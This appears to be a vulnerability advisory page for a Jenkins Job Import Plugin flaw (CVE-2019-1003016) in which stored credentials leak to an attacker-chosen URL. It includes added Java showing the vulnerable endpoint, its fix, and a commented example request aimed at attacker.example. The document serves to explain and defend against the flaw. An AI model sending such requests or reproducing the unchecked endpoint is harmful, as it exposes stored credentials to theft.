Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01N3d3LTJjdnItd3YzOM4AAQ7G
Jenkins Job Import Plugin vulnerable to exposure of sensitive information
Jenkins Job Import Plugin did not check user permissions on its API endpoint used to access remote Jenkins instances. This allowed users with Overall/Read access to Jenkins to make the Jenkins controller connect to an attacker-specified URL using attacker-specified credentials IDs (obtained through another method), so that the credentials stored in Jenkins under those IDs were sent to, and could be captured by, the attacker's server.
Job Import Plugin 3.0 will only access Jenkins instances using credentials defined in the global configuration.
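The pattern described above, as an added illustration written for this page and not code from the Job Import Plugin: a Stapler web method on a RootAction, first in the vulnerable shape (no permission check, caller supplies both the URL and the credentials ID) and then hardened in the way the 3.0 fix describes (permission check, remote chosen by name from an admin-managed global list). The class RemoteProbeAction, the RemoteSite holder, GLOBAL_SITES and the method names are hypothetical; the Jenkins, Stapler and Credentials plugin APIs they call are real.

```java
// Added illustration, not code from the Job Import Plugin. RemoteProbeAction,
// RemoteSite, GLOBAL_SITES and the doQueryRemote* names are hypothetical.
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;
import java.util.Collections;
import java.util.List;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.DomainRequirement;
import hudson.Extension;
import hudson.model.RootAction;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

@Extension
public class RemoteProbeAction implements RootAction {

    /** Hypothetical stand-in for a remote Jenkins defined in the global configuration. */
    public static final class RemoteSite {
        public final String name, url, credentialsId;
        public RemoteSite(String name, String url, String credentialsId) {
            this.name = name; this.url = url; this.credentialsId = credentialsId;
        }
    }

    /** Admin-managed list; a real plugin would persist this via GlobalConfiguration. */
    static final List<RemoteSite> GLOBAL_SITES = Arrays.asList(
        new RemoteSite("prod", "https://ci.example.internal/", "prod-ci-token"));

    // BEFORE (the SECURITY-905 (2) pattern): no permission check, and both the URL and
    // the credentials ID come from the caller. Any Overall/Read user can POST
    // ?url=https://attacker.example/&credentialsId=prod-ci-token and the controller
    // sends that stored credential to the attacker's server.
    @RequirePOST
    public FormValidation doQueryRemoteUnsafe(@QueryParameter String url,
                                              @QueryParameter String credentialsId) throws IOException {
        return probe(url, credentialsId);
    }

    // AFTER (modeled on the 3.0 behaviour): check a permission first, and accept only
    // the *name* of a globally configured remote, so neither the target URL nor the
    // credentials ID is attacker-controlled.
    @RequirePOST
    public FormValidation doQueryRemote(@QueryParameter String remoteName) throws IOException {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER); // AccessDeniedException -> HTTP 403
        for (RemoteSite site : GLOBAL_SITES) {
            if (site.name.equals(remoteName)) {
                return probe(site.url, site.credentialsId);
            }
        }
        return FormValidation.error("No such remote in global configuration: " + remoteName);
    }

    /** Shared connect logic. ACL.SYSTEM resolves any credential in the store, which is
     *  exactly why letting the caller pick credentialsId was dangerous above. */
    private static FormValidation probe(String url, String credentialsId) throws IOException {
        StandardUsernamePasswordCredentials cred = CredentialsMatchers.firstOrNull(
            CredentialsProvider.lookupCredentials(StandardUsernamePasswordCredentials.class,
                Jenkins.get(), ACL.SYSTEM, Collections.<DomainRequirement>emptyList()),
            CredentialsMatchers.withId(credentialsId));
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        if (cred != null) {
            String basic = cred.getUsername() + ":" + cred.getPassword().getPlainText();
            conn.setRequestProperty("Authorization", "Basic "
                + Base64.getEncoder().encodeToString(basic.getBytes(StandardCharsets.UTF_8)));
        }
        int status = conn.getResponseCode();
        return status == 200 ? FormValidation.ok("Connected") : FormValidation.error("HTTP " + status);
    }

    @Override public String getIconFileName() { return null; } // no sidebar link
    @Override public String getDisplayName() { return null; }
    @Override public String getUrlName() { return "remote-probe"; }
}
```

Note that @RequirePOST on the unsafe method is a CSRF mitigation, not authorization: any Overall/Read user can still POST to it directly with a valid crumb. Stapler exposes every public doXxx method on a root-reachable object, so the only thing standing between such a user and the stored credential is the explicit checkPermission call, and the fix additionally removes the caller's ability to choose the URL or the credentials ID at all.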
Permalink: https://github.com/advisories/GHSA-57ww-2cvr-wv38
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01N3d3LTJjdnItd3YzOM4AAQ7G
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: 7 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Identifiers: GHSA-57ww-2cvr-wv38, CVE-2019-1003016
References:
- https://nvd.nist.gov/vuln/detail/CVE-2019-1003016
- https://jenkins.io/security/advisory/2019-01-28/#SECURITY-905%20(2)
- https://github.com/advisories/GHSA-57ww-2cvr-wv38
Affected Packages
maven:org.jenkins-ci.plugins:job-import-plugin
Affected Version Ranges: <= 2.1
Fixed in: 3.0